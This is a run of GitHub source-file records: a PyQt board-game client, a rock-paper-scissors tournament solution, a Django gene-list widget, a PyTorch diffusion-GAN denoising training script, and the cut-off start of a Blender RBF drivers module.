self.playingChanged.emit()\r\n\r\n\r\n    newTurn= pyqtSignal(int)\r\n    def nove_kolo(self, args):\r\n        self._playing= args[0]\r\n        if self.mapa.otevrenedvere == self._playing:\r\n            self.mapa.otevrenedvere = self._openedDoor = -1\r\n            self.openedDoorChanged.emit()\r\n        self.newTurn.emit(self._playing) #announce whose turn it is; self.hraje is never assigned after __init__\r\n        self.pauza= False\r\n\r\n        self._timeTo= self.casNaKolo\r\n        self._actionPoints= self.mapa.hraci[self._playing].tahy()\r\n\r\n        self.timeToChanged.emit()\r\n        self.playingChanged.emit()\r\n        self.actionPointsChanged.emit()\r\n\r\n\r\n    spawnPlayer = pyqtSignal(int)\r\n    def spawn(self, args):\r\n        self.mapa.hraci[self.zadavatel].spawn()\r\n        #self.positions[self.zadavatel] = self.mapa.hraci[self.zadavatel].pos\r\n        self.positionsChanged.emit()\r\n        self.spawnPlayer.emit(self.zadavatel)\r\n\r\n    scanPlayer = pyqtSignal(int, int, int, int, QVariant, QVariant) #I was the one scanning\r\n    def scan(self, args):\r\n        \"\"\"\r\n        Shows the target player's cards\r\n        :param args: list(list of cards) -- optional, int (target)\r\n        :return:\r\n        \"\"\"\r\n        self.removeFromHand(self.zadavatel, \"Scanner\")\r\n        self.mapa.hraci[self.zadavatel].spravuj_predmet(\"Scanner\", -1)\r\n        if self.zadavatel == self._me:\r\n            self.scanPlayer.emit(self.zadavatel, *args)\r\n        else:\r\n            self.scanPlayer.emit(self.zadavatel, args[0], args[1], args[2], [], [])\r\n\r\n        self.action()\r\n\r\n    scanAllPlayers = pyqtSignal(int, int, int)\r\n    def plosny_scan(self, args):\r\n        \"\"\"\r\n        Shows the number of infected players\r\n        :param args: int(person|clone), int(number of infected)\r\n        \"\"\"\r\n        self.scanAllPlayers.emit(self.zadavatel, *args)\r\n        QTimer.singleShot(1000, lambda: self.sound.addEffect(\"Music/scream.wav\"))\r\n        self.action()\r\n\r\n    openDoors = pyqtSignal(int, int)\r\n    def otevri_dvere(self, args):\r\n        self.action()\r\n        self._openedDoor = self.mapa.otevrenedvere = self.zadavatel\r\n        self.openDoors.emit(self.zadavatel, args[0])\r\n        self.openedDoorChanged.emit()\r\n\r\n    burn = pyqtSignal(int)\r\n    def vypal_hnizdo(self, args):\r\n        \"\"\" ! GangBang ! 
\"\"\"\r\n self.burn(self.zadavatel)\r\n\r\n useCard = pyqtSignal(int, str)\r\n def vyloz_kartu(self, args):\r\n self.removeFromHand(self.zadavatel, args[0])\r\n self.mapa.hraci[self.zadavatel].vyloz_predmet(args[0])\r\n self.useCard.emit(self.zadavatel, args[0])\r\n if args[0] == \"Ammo\":\r\n self._ammos[self.zadavatel] = self.mapa.hraci[self.zadavatel].naboje\r\n self.ammosChanged.emit()\r\n else:\r\n #self._cardsOnBoard[self.zadavatel] = self.mapa.hraci[self.zadavatel].vylozeno\r\n self.cardsOnBoardChanged.emit()\r\n\r\n\r\n parasiteMovement = pyqtSignal(QVariant) #Udělí zranění a počká na použití vest\r\n def pohyb_parazitu(self, args):\r\n \"\"\"\r\n Zobrazí přesun parazitů\r\n :param args: příští kolo parazitů, pohyb, zranění hráči\r\n \"\"\"\r\n\r\n paraziti = self.mapa.pohyb_parazitu(args[0])\r\n\r\n self.parasitesChanged.emit()\r\n\r\n QC.QTimer.singleShot(620, lambda : self.poPohybu(paraziti, args[1]))\r\n\r\n self.parasiteTurnChanged.emit()\r\n\r\n #pohyb_parazitu a poPohybu patří k sobě\r\n\r\n disableMovement= pyqtSignal() #Zruší dočasně animace pohybu parazitů\r\n def poPohybu(self, paraziti, zraneni):\r\n self.disableMovement.emit()\r\n self._parasites = self.mapa.paraziti = paraziti\r\n self.parasitesChanged.emit()\r\n if zraneni:\r\n self.parasiteMovement.emit(zraneni)\r\n\r\n turnAround = pyqtSignal(int, int)\r\n def otoc_mistnost(self, args):\r\n y, x = args\r\n self.mapa.mapakaret[y][x][-1] = False\r\n self.turnAround.emit(y, x)\r\n\r\n summonParasite = pyqtSignal(QVariant, int)\r\n def vyvolej_parazita(self, args):\r\n if args[0] is not None: #Přitáhnu parazita\r\n i, souradnice = args\r\n self.mapa.pritahni_parazita(i, souradnice)\r\n else: #Vytvořím parazita\r\n self.mapa.vyvolej_parazita(args[1])\r\n self.summonParasite.emit(*args[1])\r\n\r\n #self._parasites= self.mapa.paraziti\r\n self.parasitesChanged.emit()\r\n\r\n shootResult = pyqtSignal(int, int, int, int)\r\n def hrac_utoci(self, args):\r\n jm, jmT, clovekT, poskozeni= args\r\n mrtvy= self.mapa.hraci[jmT].zranit(poskozeni, clovekT)\r\n #self._hitPoints[cil[1]]= self.mapa.hraci[cil[1]].zivoty\r\n self.shootResult.emit(jm, jmT, clovekT, poskozeni)\r\n self.hitPointsChanged.emit()\r\n self.positionsChanged.emit() #Kdyby někdo umřel\r\n self.action()\r\n\r\n parasiteAttackResult = pyqtSignal(QVariant)\r\n def paraziti_utoci(self, args):\r\n \"\"\"\r\n :param args: seznam zraneni, pristiKoloParazitu\r\n \"\"\"\r\n self._parasiteTurn= args[1]\r\n self.parasiteTurnChanged.emit()\r\n\r\n zraneni= args[0]\r\n if not zraneni: return\r\n for h, z in zip(self.mapa.hraci, zraneni):\r\n h.zranit(z[0], 0)\r\n h.zranit(z[1], 1)\r\n\r\n zraneni.append([0, 0]) # Paraziti ... 
- so it can be drawn...\r\n\r\n        self.parasiteAttackResult.emit(zraneni)\r\n        self.hitPointsChanged.emit()\r\n        self.positionsChanged.emit() #In case someone died - removes them from the map\r\n\r\n    def kryti_vestou(self, args):\r\n        self.removeFromHand(self.zadavatel, \"Vest\")\r\n        self.mapa.hraci[self.zadavatel].spravuj_predmet(\"Vest\", -1)\r\n\r\n\r\n    drawCard = pyqtSignal(int, int)\r\n    newItem = pyqtSignal(str) #Gives the player (me) an item\r\n    def lizani_karet(self, args):\r\n        \"\"\"\r\n        :param args: jm int(the player who drew a card), clovek, tah, optional: string(predmet)\r\n        :return:\r\n        \"\"\"\r\n        jm, clovek, tah = args[0], args[1], args[2]\r\n        if len(args) == 4:\r\n            predmet= args[3]\r\n        else:\r\n            predmet = \"\"\r\n        if predmet not in (\"Parasite\", \"Infection\"): #assumption: parasite/infection draws are events, not hand cards; checking only \"Parasite\" here left the Infection branch below unreachable\r\n            self.addToHand(jm, predmet)\r\n            self.mapa.hraci[jm].spravuj_predmet(predmet, 1)\r\n        else:\r\n            if predmet == \"Infection\":\r\n                self._corrupted = True\r\n                self.corruptedChanged.emit()\r\n            self.newItem.emit(predmet)\r\n\r\n        self.drawCard.emit(jm, clovek)\r\n        if tah: self.action()\r\n        self._itemCardsLeft -= 1\r\n        self.itemCardsLeftChanged.emit()\r\n        self.updateMeeting()\r\n\r\n    outOfCards = pyqtSignal()\r\n    def dosly_karty(self, args):\r\n        self.outOfCards.emit()\r\n\r\n    endGame = pyqtSignal(bool)\r\n    def konec(self, args):\r\n        self.endGame.emit(args[0] is args[1][self._me])\r\n        self.END = True\r\n        self.pauza = True\r\n\r\n\r\n    def chyba(self, args):\r\n        print (\"CLIENT: An error occurred on the server side: \", args)\r\n\r\n    def chybna_akce(self, args):\r\n        print (\"CLIENT: This request cannot be fulfilled: \", args)\r\n\r\n    def f(self):\r\n        self.funkce= {\r\n            \"nove_spojeni\": self.nove_spojeni,\r\n            \"odpojeni_hrace\": self.odpojeni_hrace,\r\n            \"pripojeni_hrace\": self.pripojeni_hrace,\r\n            \"pohyb_hrace\": self.pohyb_hrace,\r\n            \"objevit_mistnost\": self.objevit_mistnost,\r\n            \"vymen_kartu\": self.vymen_kartu,\r\n            \"vymena_karet\": self.vymena_karet,\r\n            \"strelba\": self.strelba,\r\n            \"bodnuti\": self.bodnuti,\r\n            \"granat\": self.granat,\r\n            \"vylecit_kar\": self.vylecit_kar,\r\n            \"vylecit_nem\": self.vylecit_nem,\r\n            \"energit\": self.energit,\r\n            \"konec_kola\": self.konec_kola,\r\n            \"nove_kolo\": self.nove_kolo,\r\n            \"spawn\": self.spawn,\r\n            \"scan\": self.scan,\r\n            \"plosny_scan\": self.plosny_scan,\r\n            \"otevri_dvere\": self.otevri_dvere,\r\n            \"vypal_hnizdo\": self.vypal_hnizdo,\r\n            \"vyloz_kartu\": self.vyloz_kartu,\r\n            \"pohyb_parazitu\": self.pohyb_parazitu,\r\n            \"otoc_mistnost\": self.otoc_mistnost,\r\n            \"vyvolej_parazita\": self.vyvolej_parazita,\r\n            \"dosly_karty\": self.dosly_karty,\r\n            \"lizani_karet\": self.lizani_karet,\r\n            \"hrac_utoci\": self.hrac_utoci,\r\n            \"paraziti_utoci\": self.paraziti_utoci,\r\n            \"kryti_vestou\": self.kryti_vestou,\r\n            \"konec\": self.konec,\r\n            \"chyba\": self.chyba,\r\n            \"chybna_akce\": self.chybna_akce,\r\n        }\r\n\r\n\r\n\r\n\r\nclass LauncherWindow(QQuickView):\r\n\r\n    def __init__(self, parent=None):\r\n        super(LauncherWindow, self).__init__(parent)\r\n        #self.setFlags(QC.Qt.Window|QC.Qt.FramelessWindowHint)\r\n\r\n        self.setSource(\r\n            QUrl.fromLocalFile(\r\n                find_data_file(\"LauncherUI/Launcher.qml\")))\r\n        self.setResizeMode(QQuickView.SizeViewToRootObject)\r\n\r\n\r\n        self.setMaximumHeight(600)\r\n        self.setMaximumWidth(800)\r\n        self.setMinimumHeight(600)\r\n        self.setMinimumWidth(800)\r\n\r\n        self.center()\r\n\r\n    def center(self):\r\n        #Center the window\r\n        desktop = QGuiApplication.primaryScreen().geometry()\r\n        size = self.geometry()\r\n        width, height = desktop.width(), desktop.height()\r\n        mw, mh = 
size.width(), size.height()\r\n        centerW = (width / 2) - (mw / 2)\r\n        centerH = (height / 2) - (mh / 2)\r\n        self.setPosition(int(centerW), int(centerH)) #setPosition expects ints; / yields floats in Python 3\r\n\r\n\r\n    def launchGame(self):\r\n        self.gWindow = GameWindow()\r\n        self.gWindow.showFullScreen()\r\n\r\n\r\nclass GameWindow(QQuickView):\r\n\r\n    closed = pyqtSignal()\r\n    def __init__(self, parent=None):\r\n        super(GameWindow, self).__init__(parent)\r\n\r\n        self.setSource(\r\n            QUrl.fromLocalFile(\r\n                find_data_file(\"GameUI/Game.qml\")))\r\n        self.setResizeMode(QQuickView.SizeRootObjectToView)\r\n\r\n    def close(self):\r\n        self.destroy()\r\n        self.closed.emit()\r\n        return True\r\n\r\n    def event(self, e):\r\n        if e.type() == QEvent.Close:\r\n            return self.close()\r\n        return QQuickView.event(self, e)\r\n\r\n\r\ndef find_data_file(filename):\r\n    if getattr(sys, 'frozen', False):\r\n        datadir = os.path.dirname(sys.executable)\r\n    else:\r\n        datadir = os.path.dirname(__file__)\r\n\r\n    return os.path.join(datadir, filename)\r\n\r\nclass QPythonBinding(QQuickItem):\r\n    def __init__(self, parent=None):\r\n        super(QPythonBinding, self).__init__(parent)\r\n\r\n    addElement = pyqtSignal(str, str) # addElement.emit(\"name\", \"value\")\r\n\r\nif __name__ == '__main__':\r\n    freeze_support()\r\n    import os\r\n    import sys\r\n\r\n\r\n    app = QGuiApplication(sys.argv)\r\n\r\n    qmlRegisterType(Launcher, \"ParanoiaLauncher\", 1, 0, \"App\")\r\n    qmlRegisterType(Game, \"ParanoiaEngine\", 1, 0, \"App\")\r\n\r\n    view = LauncherWindow()\r\n\r\n\r\n    view.show()\r\n\r\n\r\n    app.exec_()","repo_name":"Kesanov/PanicStatioin","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":50589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1636353025","text":"# Key idea: split the range in half (divide and conquer)\n# base case: the point where the recursion returns, together with the value we want\n\ndef rcp(a,b):\n    if cards[a] == cards[b] or cards[a] - cards[b] == 1\\\n    or cards[a] - cards[b] == -2:\n        return a\n    else:\n        return b\n\n\ndef winner(start,end):\n    if end - start <= 1:\n        return rcp(start,end)\n\n    g1 = winner(start, (start+end)//2)\n    g2 = winner((start+end)//2+1,end)\n    return rcp(g1,g2)\n\n\nt = int(input())\nfor tc in range(1,t+1):\n    n = int(input())\n    cards = list(map(int,input().split()))\n    print(f\"#{tc} {winner(0,n-1)+1}\")","repo_name":"GureumKim/23_TIL","sub_path":"MustReview/swea13864.py","file_name":"swea13864.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71698780712","text":"\"\"\"Custom widget field for selecting Gene Filter terms for searches.\"\"\"\n\nimport logging\nimport sys\n\nfrom django import forms\n\nfrom browser.models import Gene\n\nlogger = logging.getLogger(__name__)\n\n\nclass GeneTextarea(forms.widgets.Textarea):\n    \"\"\"Based on the Textarea widget.\"\"\"\n\n    def format_value(self, value):\n        \"\"\"Ensure plain text is shown, not Gene objects.\"\"\"\n        if not value:\n            value = \"\"\n\n        elif isinstance(value, list):\n            # Upon loading search criteria with existing genes saved, the widget gets passed a list of Gene objects\n            try:\n                value = \",\".join([gene.name for gene in value])\n            except Exception:\n                logger.error(\"Unexpected error handling rendering gene form field: %s\", sys.exc_info())\n\n        return super(GeneTextarea, 
self).format_value(value)\n","repo_name":"MRCIEU/temmpo","sub_path":"browser/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"3795909233","text":"import torch\r\nimport util.util as util\r\nimport ELD_iter_model\r\nimport time\r\nimport os\r\nimport torch.nn.functional as F\r\nimport sys\r\nfrom os.path import join\r\nfrom torchvision.utils import save_image\r\nimport dataset\r\nfrom dataset import lmdb_dataset\r\nfrom util import process\r\nimport noise\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.backends.cudnn as cudnn\r\nimport torch.distributed as dist #used by broadcast_params below\r\nimport dataset.sid_dataset as datasets\r\nimport numpy as np\r\nfrom dataset.sid_dataset import worker_init_fn\r\nfrom score_sde.models.discriminator import Discriminator_small, Discriminator_large\r\nfrom score_sde.models.ncsnpp_generator_adagn import NCSNpp\r\nfrom EMA import EMA\r\nimport shutil\r\n\r\ndef broadcast_params(params):\r\n    for param in params:\r\n        dist.broadcast(param.data, src=0)\r\n\r\ndef copy_source(file, output_dir):\r\n    shutil.copyfile(file, os.path.join(output_dir, os.path.basename(file)))\r\n\r\nclass Network(object):\r\n    def __init__(self, rank, opt):\r\n        self.opt = opt\r\n        self.writer = None\r\n        self.model = None\r\n        self.best_val_loss = 1e6\r\n        self.__setup(rank)\r\n\r\n    def __setup(self, rank):\r\n        torch.manual_seed(self.opt.seed + rank)\r\n        torch.cuda.manual_seed(self.opt.seed + rank)\r\n        torch.cuda.manual_seed_all(self.opt.seed + rank)\r\n        device = torch.device('cuda:{}'.format(rank))\r\n        self.basedir = join('checkpoints', self.opt.name)\r\n        if not os.path.exists(self.basedir):\r\n            os.mkdir(self.basedir)\r\n\r\n        opt = self.opt\r\n\r\n        \"\"\"Model\"\"\"\r\n        netG = NCSNpp(self.opt).to(device)\r\n        self.netG = netG\r\n        self.model = ELD_iter_model.ELDModelIter(self.netG)\r\n        self.model.initialize(opt)\r\n        if not opt.no_log:\r\n            self.writer = util.get_summary_writer(os.path.join(self.basedir, 'logs'))\r\n\r\n    def train(self, gpu, rank):\r\n        device = torch.device('cuda:{}'.format(rank))\r\n        print('\\nEpoch: %d' % self.epoch)\r\n        avg_meters = util.AverageMeters()\r\n        opt = self.opt\r\n        model = self.model\r\n        epoch = self.epoch\r\n        epoch_start_time = time.time()\r\n        batch_size = opt.batch_size\r\n        nz = opt.nz #latent dimension\r\n        # model.print_optimizer_param()\r\n\r\n        cudnn.benchmark = True\r\n\r\n        evaldir = './datasets/SID/Sony'\r\n        traindir = './datasets/train'\r\n\r\n        expo_ratio = [100, 300] # [100, 250, 300]\r\n        read_expo_ratio = lambda x: float(x.split('_')[-1][:-5])\r\n        # evaluate 15 indoor scenes (but you can also evaluate the performance on the whole dataset)\r\n        indoor_ids = dataset.read_paired_fns('./SID_Sony_15_paired.txt')\r\n        eval_fns_list = [[(fn[0], fn[1]) for fn in indoor_ids if int(fn[2]) == ratio] for ratio in expo_ratio]\r\n\r\n        cameras = ['CanonEOS5D4', 'CanonEOS70D', 'CanonEOS700D', 'NikonD850', 'SonyA7S2']\r\n        noise_model = noise.NoiseModel(model=\"P+G+r+u\", include=4)\r\n\r\n        repeat = 1 if opt.max_dataset_size is None else 1288 / opt.max_dataset_size\r\n        print('[i] repeat:', repeat)\r\n\r\n        CRF = None\r\n        if opt.crf:\r\n            print('[i] enable CRF')\r\n            CRF = process.load_CRF()\r\n\r\n        if opt.stage_out == 'srgb':\r\n            target_data = lmdb_dataset.LMDBDataset(join(traindir, 'SID_Sony_SRGB_CRF.db'))\r\n        else:\r\n            target_data = lmdb_dataset.LMDBDataset(
join(traindir, 'SID_Sony_Raw.db'),\r\n                size=opt.max_dataset_size, repeat=repeat)\r\n        if opt.stage_in == 'srgb':\r\n            input_data = datasets.ISPDataset(\r\n                lmdb_dataset.LMDBDataset(join(traindir, 'SID_Sony_Raw.db')),\r\n                noise_maker=noise_model, CRF=CRF)\r\n        else:\r\n            ## Synthesizing noise on-the-fly by noise model\r\n            input_data = datasets.SynDataset(\r\n                lmdb_dataset.LMDBDataset(join(traindir, 'SID_Sony_Raw.db')),\r\n                noise_maker=noise_model, num_burst=1,\r\n                size=opt.max_dataset_size, repeat=repeat, continuous_noise=opt.continuous_noise)\r\n\r\n        ## Noise generated offline\r\n        # camera = cameras[opt.include]\r\n        # input_data = lmdb_dataset.LMDBDataset(\r\n        #     join(traindir, f'SID_Sony_syn_Raw_{camera}.db'),\r\n        #     size=opt.max_dataset_size, repeat=repeat)\r\n\r\n        train_dataset = datasets.ELDTrainDataset(target_dataset=target_data, input_datasets=[input_data])\r\n        train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset,\r\n                                                                        num_replicas= self.opt.world_size,\r\n                                                                        rank=self.opt.rank)\r\n        train_loader = torch.utils.data.DataLoader(train_dataset,\r\n                                                   batch_size=batch_size,\r\n                                                   shuffle=False,\r\n                                                   num_workers=4,\r\n                                                   pin_memory=True,\r\n                                                   sampler=train_sampler,\r\n                                                   drop_last = True)\r\n\r\n        netG = self.netG #local alias; the code below references netG, which was otherwise undefined in train()\r\n        netD = Discriminator_large(nc = 2*self.opt.num_channels, ngf = self.opt.ngf,\r\n                                   t_emb_dim = opt.t_emb_dim,\r\n                                   act=nn.LeakyReLU(0.2)).to(device)\r\n\r\n        broadcast_params(netG.parameters())\r\n        broadcast_params(netD.parameters())\r\n        optimizerD = optim.Adam(netD.parameters(), lr=self.opt.lr_d, betas = (self.opt.beta1, self.opt.beta2))\r\n\r\n        optimizerG = optim.Adam(netG.parameters(), lr=self.opt.lr_g, betas = (self.opt.beta1, self.opt.beta2))\r\n\r\n        if self.opt.use_ema:\r\n            optimizerG = EMA(optimizerG, ema_decay=opt.ema_decay)\r\n\r\n        schedulerG = torch.optim.lr_scheduler.CosineAnnealingLR(optimizerG, self.opt.num_epoch, eta_min=1e-5)\r\n        schedulerD = torch.optim.lr_scheduler.CosineAnnealingLR(optimizerD, self.opt.num_epoch, eta_min=1e-5)\r\n\r\n        netG = nn.parallel.DistributedDataParallel(netG, device_ids=[gpu])\r\n        netD = nn.parallel.DistributedDataParallel(netD, device_ids=[gpu])\r\n\r\n        exp = opt.exp\r\n        parent_dir = \"./saved_info/dd_gan/{}\".format(opt.dataset)\r\n\r\n        exp_path = os.path.join(parent_dir,exp)\r\n        if rank == 0:\r\n            if not os.path.exists(exp_path):\r\n                os.makedirs(exp_path)\r\n                copy_source(__file__, exp_path)\r\n                shutil.copytree('score_sde/models', os.path.join(exp_path, 'score_sde/models'))\r\n        # Whether to resume training\r\n        if self.opt.resume:\r\n            checkpoint_file = os.path.join(exp_path, 'content.pth')\r\n            checkpoint = torch.load(checkpoint_file, map_location=device)\r\n            init_epoch = checkpoint['epoch']\r\n            epoch = init_epoch\r\n            netG.load_state_dict(checkpoint['netG_dict'])\r\n            # load G\r\n\r\n            optimizerG.load_state_dict(checkpoint['optimizerG'])\r\n            schedulerG.load_state_dict(checkpoint['schedulerG'])\r\n            # load D\r\n            netD.load_state_dict(checkpoint['netD_dict'])\r\n            optimizerD.load_state_dict(checkpoint['optimizerD'])\r\n            schedulerD.load_state_dict(checkpoint['schedulerD'])\r\n            global_step = checkpoint['global_step']\r\n            print(\"=> loaded checkpoint (epoch {})\"\r\n                  .format(checkpoint['epoch']))\r\n        else:\r\n            global_step, epoch, init_epoch = 0, 0, 0\r\n\r\n        for epoch in range(init_epoch, opt.num_epoch+1):\r\n            train_sampler.set_epoch(epoch)\r\n            for i, data in enumerate(train_loader):\r\n                for p in netD.parameters():\r\n                    p.requires_grad = True\r\n\r\n                model.set_input(data, mode='train')\r\n                latent_z = torch.randn(batch_size, nz, device=device)\r\n                output_list, 
target_list, ratio_list = model.forward(train_loader, opt.iter_num, latent_z)\r\n                iter_num = len(ratio_list)-1 if not isinstance(ratio_list, torch.Tensor) else ratio_list.shape[1]-1\r\n                netD.zero_grad()\r\n                errD_real_total = 0\r\n                for t in range(iter_num): #inner index renamed from i, which shadowed the enumerate index above\r\n                    target_list[t].requires_grad = True\r\n                    D_real = netD(target_list[t], t/iter_num, target_list[t+1].detach()).view(-1)\r\n                    errD_real = F.softplus(-D_real)\r\n                    errD_real = errD_real.mean()\r\n                    errD_real_total += errD_real\r\n                errD_real_total.backward(retain_graph=True)\r\n\r\n                if opt.lazy_reg is None:\r\n                    #R1 gradient penalty, computed on the last step of the chain\r\n                    grad_real = torch.autograd.grad(\r\n                        outputs=D_real.sum(), inputs=target_list[t], create_graph=True\r\n                    )[0]\r\n                    grad_penalty = (\r\n                        grad_real.view(grad_real.size(0), -1).norm(2, dim=1) ** 2\r\n                    ).mean()\r\n\r\n                    grad_penalty = opt.r1_gamma / 2 * grad_penalty\r\n                    grad_penalty.backward()\r\n                else:\r\n                    if global_step % opt.lazy_reg == 0:\r\n                        grad_real = torch.autograd.grad(\r\n                            outputs=D_real.sum(), inputs=target_list[t], create_graph=True\r\n                        )[0]\r\n                        grad_penalty = (\r\n                            grad_real.view(grad_real.size(0), -1).norm(2, dim=1) ** 2\r\n                        ).mean()\r\n\r\n                        grad_penalty = opt.r1_gamma / 2 * grad_penalty\r\n                        grad_penalty.backward()\r\n\r\n                errD_fake_total = 0\r\n                for t in range(iter_num):\r\n                    target_list[t].requires_grad = True\r\n                    D_fake = netD(output_list[t], t/iter_num, output_list[t+1].detach()).view(-1)\r\n                    errD_fake = F.softplus(-D_fake)\r\n                    errD_fake = errD_fake.mean()\r\n                    errD_fake_total += errD_fake\r\n                errD_fake_total.backward(retain_graph=True)\r\n\r\n                errD = errD_real_total + errD_fake_total\r\n                # Update D\r\n                optimizerD.step()\r\n\r\n                #update G\r\n                for p in netD.parameters():\r\n                    p.requires_grad = False\r\n                netG.zero_grad()\r\n                errG_total = 0\r\n                for t in range(iter_num):\r\n                    output = netD(output_list[t], ratio_list[t]/np.max(ratio_list), target_list[t+1].detach()).view(-1)\r\n                    errG = F.softplus(-output)\r\n                    errG = errG.mean()\r\n                    errG_total += errG\r\n                errG_total.backward()\r\n                optimizerG.step()\r\n\r\n                global_step += 1\r\n                if global_step % 100 == 0:\r\n                    if rank == 0:\r\n                        print('epoch {} iteration{}, G Loss: {}, D Loss: {}'.format(epoch,global_step, errG.item(), errD.item()))\r\n\r\n            if not opt.no_lr_decay:\r\n\r\n                schedulerG.step()\r\n                schedulerD.step()\r\n\r\n            if rank == 0:\r\n                if epoch % 10 == 0:\r\n                    save_image(output_list[-1], os.path.join(exp_path, 'xpos_epoch_{}.png'.format(epoch)), normalize=True) #only save_image is imported; torchvision itself is not\r\n\r\n                if opt.save_content:\r\n                    if epoch % opt.save_content_every == 0:\r\n                        print('Saving content.')\r\n                        content = {'epoch': epoch + 1, 'global_step': global_step, 'args': opt,\r\n                                   'netG_dict': netG.state_dict(), 'optimizerG': optimizerG.state_dict(),\r\n                                   'schedulerG': schedulerG.state_dict(), 'netD_dict': netD.state_dict(),\r\n                                   'optimizerD': optimizerD.state_dict(), 'schedulerD': schedulerD.state_dict()}\r\n\r\n                        torch.save(content, os.path.join(exp_path, 'content.pth'))\r\n\r\n                if epoch % opt.save_ckpt_every == 0:\r\n                    if opt.use_ema:\r\n                        optimizerG.swap_parameters_with_ema(store_params_in_ema=True)\r\n\r\n                    torch.save(netG.state_dict(), os.path.join(exp_path, 'netG_{}.pth'.format(epoch)))\r\n                    if opt.use_ema:\r\n                        optimizerG.swap_parameters_with_ema(store_params_in_ema=True)\r\n\r\n\r\n        # train_loader.reset()\r\n\r\n    def eval(self, val_loader, dataset_name, savedir=None, loss_key=None, **kwargs):\r\n        iter_num = kwargs.get(\"iter_num\", None)\r\n        if iter_num:\r\n            print(\"[i] Evaluation using iteration number of %d\"%iter_num)\r\n        avg_meters = util.AverageMeters()\r\n        model 
= self.model\r\n        opt = self.opt\r\n        with torch.no_grad():\r\n            for i, data in enumerate(val_loader):\r\n                index = model.eval(data, savedir=savedir, **kwargs)\r\n                # print(data['fn'], index)\r\n                avg_meters.update(index)\r\n\r\n                util.progress_bar(i, len(val_loader), str(avg_meters))\r\n\r\n        if not opt.no_log:\r\n            util.write_loss(self.writer, join('eval', dataset_name), avg_meters, self.epoch)\r\n\r\n        if loss_key is not None:\r\n            val_loss = avg_meters[loss_key]\r\n            if val_loss < self.best_val_loss: # smaller loss indicates better\r\n                self.best_val_loss = val_loss\r\n                print('saving the best model at the end of epoch %d, iters %d' %\r\n                      (self.epoch, self.iterations))\r\n                model.save(label='best_{}_{}'.format(loss_key, dataset_name))\r\n\r\n        return avg_meters\r\n\r\n    def test(self, test_loader, savedir=None, **kwargs):\r\n        model = self.model\r\n        opt = self.opt\r\n        with torch.no_grad():\r\n            for i, data in enumerate(test_loader):\r\n                model.test(data, savedir=savedir, **kwargs)\r\n                util.progress_bar(i, len(test_loader))\r\n\r\n    def set_learning_rate(self, lr):\r\n        for optimizer in self.model.optimizers:\r\n            print('[i] set learning rate to {}'.format(lr))\r\n            util.set_opt_param(optimizer, 'lr', lr)\r\n\r\n    @property\r\n    def iterations(self):\r\n        return self.model.iterations\r\n\r\n    @iterations.setter\r\n    def iterations(self, i):\r\n        self.model.iterations = i\r\n\r\n    @property\r\n    def epoch(self):\r\n        return self.model.epoch\r\n\r\n    @epoch.setter\r\n    def epoch(self, e):\r\n        self.model.epoch = e","repo_name":"mm2319/Test","sub_path":"denoising-diffusion-gan/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":15126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13607557990","text":"\nfrom typing import TYPE_CHECKING, Callable, Dict, Optional, Sequence, Tuple, Union\nfrom functools import partial\nfrom bpy.types import NodeTree, PropertyGroup\nfrom bpy.props import BoolProperty, EnumProperty, PointerProperty, StringProperty\nfrom rbf_drivers.api.pose_data import POSE_DATA_CONTAINER_TYPE_SIZES\nfrom .mixins import Symmetrical\nfrom .pose_data_ import PoseDataFrame\nfrom .input import InputRotationAxisUpdateEvent, InputRotationModeUpdateEvent\nfrom .inputs import Inputs\nfrom .poses import PoseNewEvent, Poses\nfrom .outputs import RBFDriverOutputs\nfrom ..app.events import dataclass, dispatch_event, event_handler, Event\nfrom ..app.utils import (\n    euler_to_quaternion,\n    euler_to_swing_twist_x,\n    euler_to_swing_twist_y,\n    euler_to_swing_twist_z,\n    quaternion_to_axis_angle,\n    quaternion_to_euler,\n    quaternion_to_swing_twist_x,\n    quaternion_to_swing_twist_y,\n    quaternion_to_swing_twist_z,\n    swing_twist_x_to_euler,\n    swing_twist_y_to_euler,\n    swing_twist_z_to_euler,\n    swing_twist_x_to_quaternion,\n    swing_twist_y_to_quaternion,\n    swing_twist_z_to_quaternion,\n    swing_twist_x_to_swing_twist_y,\n    swing_twist_x_to_swing_twist_z,\n    swing_twist_y_to_swing_twist_x,\n    swing_twist_y_to_swing_twist_z,\n    swing_twist_z_to_swing_twist_x,\n    swing_twist_z_to_swing_twist_y,\n    transform_matrix,\n    transform_target,\n    )\nif TYPE_CHECKING:\n    from bpy.types import Context\n\nROTATION_CONVERSION_LUT: Dict[str, Dict[str, Optional[Callable]]] = {\n    'EULER': {\n        'EULER'     : None,\n        'SWING'     : euler_to_quaternion,\n        'TWIST_X'   : partial(euler_to_swing_twist_x, quaternion=True),\n        'TWIST_Y'   : partial(euler_to_swing_twist_y, quaternion=True),\n        'TWIST_Z'   : partial(euler_to_swing_twist_z, quaternion=True),\n        'QUATERNION': euler_to_quaternion,\n        },\n    
